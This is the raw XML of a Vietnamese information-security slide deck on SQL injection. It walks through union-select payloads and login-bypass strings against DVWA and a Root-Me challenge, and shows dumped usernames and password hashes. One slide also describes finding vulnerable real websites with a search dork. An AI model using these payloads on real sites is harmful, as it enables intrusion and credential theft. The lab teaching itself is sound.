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58" r:id="rId3"/>
    <p:sldId id="266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hallenge01.root-me.org/web-serveur/ch9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hallenge01.root-me.org/web-serveur/ch9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855" y="3614563"/>
            <a:ext cx="9235858" cy="2560767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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/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KTPM –K14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20794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/>
          <a:lstStyle/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F12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43" y="2133013"/>
            <a:ext cx="6543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08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/>
          <a:lstStyle/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57" y="987600"/>
            <a:ext cx="5419725" cy="220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157" y="4910528"/>
            <a:ext cx="2276475" cy="10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820" y="4885017"/>
            <a:ext cx="3133725" cy="69532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814632" y="5323562"/>
            <a:ext cx="1070519" cy="13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54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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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database: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and 1=1 union select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null,user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#</a:t>
            </a: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server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name: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k888minhp_kBz</a:t>
            </a:r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8" y="2464757"/>
            <a:ext cx="360045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214" y="2223304"/>
            <a:ext cx="3133725" cy="160972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4489798" y="2902907"/>
            <a:ext cx="1279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90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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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and 1=1 union select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table_name,null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information_schema.tables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1=1 #</a:t>
            </a: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09" y="2690747"/>
            <a:ext cx="5876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47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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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 Table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and 1=1 union select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table_name,column_name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information_schema.columns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where 1=1 #</a:t>
            </a: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25" y="2661781"/>
            <a:ext cx="5829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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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column_name ta lấy được giá trị trong đó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and 1=1 union select first_name,password from [tên d.a].users #</a:t>
            </a:r>
            <a:b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 and 1=1 union select first_name,password from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k888minhp_kBz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.users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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19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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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22" y="1481594"/>
            <a:ext cx="66579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17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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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md5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được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password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13" y="1689904"/>
            <a:ext cx="8005649" cy="35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48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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-400050" algn="l">
              <a:buFont typeface="Wingdings 3" charset="2"/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Root-me.org (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://challenge01.root-me.org/web-serveur/ch9/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hang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vi-VN" dirty="0"/>
              <a:t>số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>admin’\*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>" or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>' or 'a'='a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>') or ('a'=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>'a</a:t>
            </a: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782" y="2308377"/>
            <a:ext cx="2600325" cy="2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341" y="2868916"/>
            <a:ext cx="2905125" cy="1076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085567" y="3407078"/>
            <a:ext cx="1127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36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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-400050" algn="l">
              <a:buFont typeface="Wingdings 3" charset="2"/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Root-me.org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http://challenge01.root-me.org/web-serveur/ch9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hang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vi-VN" dirty="0"/>
              <a:t>số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>admin’/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>" or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>' or 'a'='a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>') or ('a'=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>'a</a:t>
            </a:r>
            <a:endParaRPr lang="vi-V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85567" y="3407078"/>
            <a:ext cx="1127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873" y="2278365"/>
            <a:ext cx="2638425" cy="225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910" y="2825728"/>
            <a:ext cx="2809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9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333" y="1791222"/>
            <a:ext cx="7766936" cy="167089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0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968" y="388306"/>
            <a:ext cx="8338391" cy="5549031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BƯỚC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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đuôi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inurl:product_detail.php?id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=site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injection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URL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tables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+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)=&gt;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union select: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=&gt;do admin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version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Version()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URL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database()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URL</a:t>
            </a:r>
            <a:endParaRPr lang="vi-V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5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DVWA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Low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27" y="2255402"/>
            <a:ext cx="69056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27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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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database: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{} 1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all select user(),database()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server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user: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name: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phucbinz</a:t>
            </a:r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31" y="2284369"/>
            <a:ext cx="6581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11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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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show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{} 1'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all select 1,table_name from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information_schema.tables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14" y="2901146"/>
            <a:ext cx="54768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04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>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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{} 1'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all select 1,group_concat(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user,password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users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vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>:   Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>: 5f4dcc3b5aa765d61d8327deb882cf99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>IP: gordonbe99a18c428cb38d5f260853678922e03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>13378d3533d75ae2c3966d7e0d4fcc69216b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>pablo0d107d09f5bbe40cade3de5c71e9e9b7,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>smithy5f4dcc3b5aa765d61d8327deb882cf99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="vi-V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8" y="2409630"/>
            <a:ext cx="8525943" cy="124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8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333" y="1791222"/>
            <a:ext cx="7766936" cy="167089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injection </a:t>
            </a:r>
            <a:b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medium </a:t>
            </a:r>
            <a:endParaRPr lang="vi-V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3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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l"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DVWA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/>
              <a:t>medium</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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 medium không còn ô textbox để nhập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87" y="2227415"/>
            <a:ext cx="66389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4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377</TotalTime>
  <Words>100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Unicode MS</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Đảm bảo an toàn thông tin </vt:lpstr>
      <vt:lpstr>Tấn công SQL injection </vt:lpstr>
      <vt:lpstr>      CÁC BƯỚC  1. Tìm website bị lỗi  Tìm website có đuôi inurl:product_detail.php?id=site   2. Kiểm tra website có bị lỗi SQL injection không? Thêm kí tự ' vào URL   3. Tìm số cột của tables mà có câu lệnh sql truy vấn order by + số lượng(từ 1 đến khi nào lỗi)=&gt; số cột   4. Hiện một số cột bị lỗi  Dùng union select: khi dùng-&gt; bị lỗi? =&gt;do admin đã mã hóa các từ khóa SQL . Thế nên h chúng ta cần đưa ra 1  mệnh đề sai để kết quả trả về những cột lỗi   5. Kiểm tra một vài thông tin của Database   + version đang chạy trên wb   + tên database  Chèn thêm Version() vào URL Chèn thêm database() vào URL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Tấn công SQL injection  medium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Đảm bảo an toàn thông tin</dc:title>
  <dc:creator>Phúc Binz</dc:creator>
  <cp:lastModifiedBy>PhucND</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-28T12:47:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-25T09:15:20Z</dcterms:modified>
</cp:coreProperties>
</file>